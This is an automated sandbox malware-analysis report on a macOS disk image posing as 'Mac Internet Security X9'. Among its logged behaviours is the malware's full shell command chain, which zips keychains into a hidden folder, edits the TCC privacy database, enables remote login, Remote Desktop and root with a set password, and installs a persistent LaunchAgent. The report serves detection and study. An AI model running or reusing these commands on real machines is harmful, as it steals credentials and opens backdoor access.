
Analysis Report

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 57793
Start time: 16:35:16
Joe Sandbox Product: Cloud
Start date: 26.07.2018
Overall analysis duration: 0h 13m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: FmTmHujm4o (renamed file extension from none to dmg)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal100.troj.spyw.expl.macDMG@0/33@1/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Classification

Signature Overview

AV Detection:

Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Networking:

Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: mesu.g.aaplimg.com
Urls found in memory or binary data
Source: FmTmHujm4o.dmg | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown | Network traffic detected: HTTP traffic on port 49263 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Enables system access through Apple's Remote Desktop Sharing for all users
Source: /usr/bin/sudo (PID: 546) | Apple Remote Desktop kickstart all users: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Explicitly disables computer sleep within the System Preferences (may be set for surreptitious remote desktop access)
Source: /usr/bin/sudo (PID: 672) | Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setcomputersleep Never
Explicitly enables remote login within the System Preferences
Source: /usr/bin/sudo (PID: 543) | Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setremotelogin on
Uses kickstart to modify Apple's Remote Desktop settings
Source: /usr/bin/sudo (PID: 546) | Apple Remote Desktop kickstart: /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -> /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

System Summary:

Classification label
Source: classification engine | Classification label: mal100.troj.spyw.expl.macDMG@0/33@1/0

Data Obfuscation:

Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Executes the "sudo" command used to execute a command as another user
Source: /bin/bash (PID: 536) | Sudo executable: /usr/bin/sudo -> sudo -S zip -r /Users/henry/.calisto/KC.zip /Users/henry/Library/Keychains/ /Library/Keychains/
Source: /bin/bash (PID: 540) | Sudo executable: /usr/bin/sudo -> sudo /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)
Source: /bin/bash (PID: 542) | Sudo executable: /usr/bin/sudo -> sudo systemsetup -setremotelogin on
Source: /bin/bash (PID: 545) | Sudo executable: /usr/bin/sudo -> sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Source: /bin/bash (PID: 671) | Sudo executable: /usr/bin/sudo -> sudo systemsetup -setcomputersleep Never
Source: /bin/bash (PID: 673) | Sudo executable: /usr/bin/sudo -> sudo cp -R /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app /System/Library/CoreServices/launchb.app
Source: /bin/bash (PID: 675) | Sudo executable: /usr/bin/sudo -> sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer /System/Library/CoreServices/launchb.app/Contents/MacOS/launchb
Source: /bin/bash (PID: 677) | Sudo executable: /usr/bin/sudo -> sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist /System/Library/CoreServices/launchb.app/Contents/Info.plist
Source: /bin/bash (PID: 679) | Sudo executable: /usr/bin/sudo -> sudo cp -f /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist
Many shell processes execute programs via execve syscall (may be indicative for malicious behavior)
Source: /bin/sh (PID: 548) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 549) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 550) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uid
Source: /bin/sh (PID: 551) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 552) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uid
Source: /bin/sh (PID: 553) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 554) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 555) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uid
Source: /bin/sh (PID: 556) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 557) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 558) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 559) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 560) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 561) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 562) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uid
Source: /bin/sh (PID: 563) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 564) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 565) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uid
Source: /bin/sh (PID: 566) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uid
Source: /bin/sh (PID: 569) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 570) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 571) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 572) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uid
Source: /bin/sh (PID: 573) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 574) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 575) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 576) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 577) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 578) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 579) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 580) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 581) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uid
Source: /bin/sh (PID: 582) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uid
Source: /bin/sh (PID: 583) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 584) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 585) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 586) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uid
Source: /bin/sh (PID: 587) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 588) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 589) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 590) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 591) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 592) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 593) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 594) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 595) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 596) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 597) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 598) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Source: /bin/sh (PID: 599) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uid
Source: /bin/sh (PID: 600) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uid
Source: /bin/sh (PID: 601) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uid
Source: /bin/sh (PID: 602) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uid
Source: /bin/sh (PID: 603) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uid
Source: /bin/sh (PID: 604) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uid
Source: /bin/sh (PID: 605) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uid
Source: /bin/sh (PID: 606) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uid
Source: /bin/sh (PID: 607) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uid
Source: /bin/sh (PID: 608) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uid
Source: /bin/sh (PID: 609) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uid
Source: /bin/sh (PID: 610) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uid
Source: /bin/sh (PID: 611) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uid
Source: /bin/sh (PID: 612) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uid
Source: /bin/sh (PID: 613) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uid
Source: /bin/sh (PID: 614) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uid
Source: /bin/sh (PID: 615) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uid
Source: /bin/sh (PID: 616) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uid
Source: /bin/sh (PID: 617) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uid
Source: /bin/sh (PID: 618) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uid
Source: /bin/sh (PID: 619) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uid
Source: /bin/sh (PID: 620) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uid
Source: /bin/sh (PID: 621) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uid
Source: /bin/sh (PID: 622) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uid
Source: /bin/sh (PID: 623) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uid
Source: /bin/sh (PID: 624) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uid
Source: /bin/sh (PID: 625) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uid
Source: /bin/sh (PID: 626) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uid
Source: /bin/sh (PID: 627) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uid
Source: /bin/sh (PID: 628) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uid
Source: /bin/sh (PID: 629) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uid
Source: /bin/sh (PID: 630) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uid
Source: /bin/sh (PID: 631) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uid
Source: /bin/sh (PID: 632) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uid
Source: /bin/sh (PID: 633) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uid
Source: /bin/sh (PID: 634) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uid
Source: /bin/sh (PID: 635) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uid
Source: /bin/sh (PID: 636) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uid
Source: /bin/sh (PID: 637) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uid
Source: /bin/sh (PID: 638) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uid
Source: /bin/sh (PID: 639) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uid
Source: /bin/sh (PID: 640) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uid
Source: /bin/sh (PID: 641) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uid
Source: /bin/sh (PID: 642) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uid
Source: /bin/sh (PID: 643) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uid
Source: /bin/sh (PID: 644) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uid
Source: /bin/sh (PID: 645) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uid
Source: /bin/sh (PID: 646) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uid
Source: /bin/sh (PID: 649) | Shell process: /bin/launchctl list com.apple.screensharing
Source: /bin/sh (PID: 666) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivs
Source: /bin/sh (PID: 667) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -create /Local/Target/Users/henry naprivs 1073742079
Changes permissions of written Mach-O files
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib: bits: - usr: rx grp: rx all: rwx
Source: /bin/cp (PID: 674) | Permissions modified for written 64-bit Mach-O /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer: bits: - usr: rx grp: rx all: rwx
Creates application bundles
Source: /bin/cp (PID: 674) | Bundle Info.plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /bin/mkdir (PID: 533) | Hidden Directory created: /Users/henry/.calisto/ -> /Users/henry/.calisto/
Executes commands using a shell command-line interpreter
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Shell command executed: /bin/bash -c mkdir ~/.calisto/
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Shell command executed: /bin/bash -c echo | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo henry > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db 'INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL) ' && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\ Internet\ Security\ X9/Mac\ Internet\ Security\ X9\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\ Internet\ Security\ X9\ Installer /System/Library/CoreServices/launchb.app/Contents/M
Source: /usr/bin/perl5.18 (PID: 548) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users
Source: /usr/bin/perl5.18 (PID: 549) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid
Source: /usr/bin/perl5.18 (PID: 550) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_analyticsd' uid
Source: /usr/bin/perl5.18 (PID: 551) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid
Source: /usr/bin/perl5.18 (PID: 552) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_applepay' uid
Source: /usr/bin/perl5.18 (PID: 553) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid
Source: /usr/bin/perl5.18 (PID: 554) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid
Source: /usr/bin/perl5.18 (PID: 555) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appstore' uid
Source: /usr/bin/perl5.18 (PID: 556) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid
Source: /usr/bin/perl5.18 (PID: 557) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid
Source: /usr/bin/perl5.18 (PID: 558) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid
Source: /usr/bin/perl5.18 (PID: 559) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid
Source: /usr/bin/perl5.18 (PID: 560) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid
Source: /usr/bin/perl5.18 (PID: 561) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid
Source: /usr/bin/perl5.18 (PID: 562) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_captiveagent' uid
Source: /usr/bin/perl5.18 (PID: 563) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid
Source: /usr/bin/perl5.18 (PID: 564) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid
Source: /usr/bin/perl5.18 (PID: 565) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cmiodalassistants' uid
Source: /usr/bin/perl5.18 (PID: 566) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid
Source: /usr/bin/perl5.18 (PID: 567) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid
Source: /usr/bin/perl5.18 (PID: 568) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ctkd' uid
Source: /usr/bin/perl5.18 (PID: 569) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid
Source: /usr/bin/perl5.18 (PID: 570) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid
Source: /usr/bin/perl5.18 (PID: 571) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid
Source: /usr/bin/perl5.18 (PID: 572) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_datadetectors' uid
Source: /usr/bin/perl5.18 (PID: 573) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid
Source: /usr/bin/perl5.18 (PID: 574) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid
Source: /usr/bin/perl5.18 (PID: 575) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid
Source: /usr/bin/perl5.18 (PID: 576) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid
Source: /usr/bin/perl5.18 (PID: 577) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid
Source: /usr/bin/perl5.18 (PID: 578) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid
Source: /usr/bin/perl5.18 (PID: 579) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid
Source: /usr/bin/perl5.18 (PID: 580) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid
Source: /usr/bin/perl5.18 (PID: 581) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_findmydevice' uid
Source: /usr/bin/perl5.18 (PID: 582) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_fpsd' uid
